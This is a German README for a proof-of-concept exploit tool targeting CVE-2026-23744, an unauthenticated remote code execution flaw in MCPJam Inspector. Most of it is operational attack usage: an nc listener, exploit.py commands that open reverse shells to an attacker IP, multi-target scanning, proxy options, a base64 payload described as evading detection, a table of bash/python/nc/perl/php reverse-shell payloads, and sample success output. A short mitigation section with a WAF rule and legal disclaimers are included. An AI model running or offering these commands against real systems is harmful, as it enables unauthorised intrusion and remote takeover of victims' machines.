
Ein Proof-of-Concept-Exploit für CVE-2026-23744 - die Remote Code Execution (RCE)-Schwachstelle in MCPJam Inspector. Dieses Tool demonstriert den Sicherheitsfehler in den Versionen <=1.4.2 und hilft Sicherheitsforschern, Patches zu verifizieren. Nur für autorisierte Tests und zu Bildungszwecken. Enthält mehrere Payload-Optionen, Befehlsausführung und Sitzungsverwaltung.
Dieses Tool ist NUR für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Die unbefugte Nutzung ist illegal. Die Nutzer übernehmen die volle Verantwortung für ihre Handlungen.
Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2026-23744, eine nicht authentifizierte Remote-Code-Ausführungs-Sicherheitslücke (RCE) in MCPJam Inspector Versionen <=1.4.2. Die Schwachstelle hat einen kritischen CVSS-Score von 9,8, was auf ein schwerwiegendes Risiko mit einem Netzwerk-Angriffsvektor hinweist.
Das Exploit-Tool bietet eine umfassende Reihe von Funktionen, die für effektive Sicherheitstests entwickelt wurden:
Befolgen Sie diese Schritte, um das Exploit-Tool einzurichten:
Repository klonen:
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
Abhängigkeiten installieren:
pip install -r requirements.txt
Um einen grundlegenden Exploit zu starten, richten Sie zuerst einen Listener ein und führen Sie dann das Exploit-Skript aus:
# Listener starten
nc -lvnp 4444
# Exploit ausführen
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
Führen Sie einzelne Befehle oder Befehle aus einer Datei aus:
# Einzelnen Befehl ausführen
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# Befehle aus Datei ausführen
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
Nutzen Sie verschiedene Payload-Typen für unterschiedliche Szenarien:
# Python Reverse-Shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# Netcat Reverse-Shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# Base64-kodierter Payload
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
Scannen Sie mehrere Ziele auf Schwachstellen:
# Zieldatei erstellen
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# Nach anfälligen Zielen scannen
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
Erkunden Sie erweiterte Funktionalitäten wie Fingerprinting, Proxy-Nutzung, ausführlichen Modus und Auto-Listener-Einrichtung:
# Mit Fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# Mit Proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# Ausführlicher Modus
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# Auto-Listener
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444
Zum Schutz vor CVE-2026-23744 ist es entscheidend, die folgenden sofortigen Maßnahmen zu ergreifen:
POST-Anfragen an /api/mcp/connect.Beispiel für eine Nginx-WAF-Regel zum Blockieren allgemeiner schädlicher Muster:
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
F: Ist die Nutzung legal?
A: Dieses Tool ist nur legal auf Systemen zu verwenden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
F: Welche Systeme sind anfällig?
A: MCPJam Inspector Versionen <=1.4.2 sind anfällig.
F: Wie kann ich meine Systeme schützen?
A: Aktualisieren Sie MCPJam Inspector sofort auf Version >1.4.2.
Sudeepa Wanigarathna
Die unbefugte Nutzung dieses Tools ist illegal und kann schwerwiegende Konsequenzen haben, einschließlich:
Gemacht mit ❤️ von Sudeepa Wanigarathna
| Attribut | Details |
|---|
| CVE-ID | CVE-2026-23744 |
| Sicherheitslücke | Nicht authentifizierte Remote-Code-Ausführung |
| Betroffene Versionen | <=1.4.2 |
| CVSS-Score | 9.8 (Kritisch) |
| Angriffsvektor | Netzwerk |
| Typ | Befehl | Am besten geeignet für |
|---|
bash | Bash Reverse-Shell | Die meisten Linux-Systeme |
python | Python3 Reverse-Shell | Systeme mit Python |
nc | Netcat Reverse-Shell | Systeme mit Netcat |
perl | Perl Reverse-Shell | Systeme mit Perl |
php | PHP Reverse-Shell | Systeme mit PHP |
base64 | Base64-kodiert | Umgehung der Erkennung |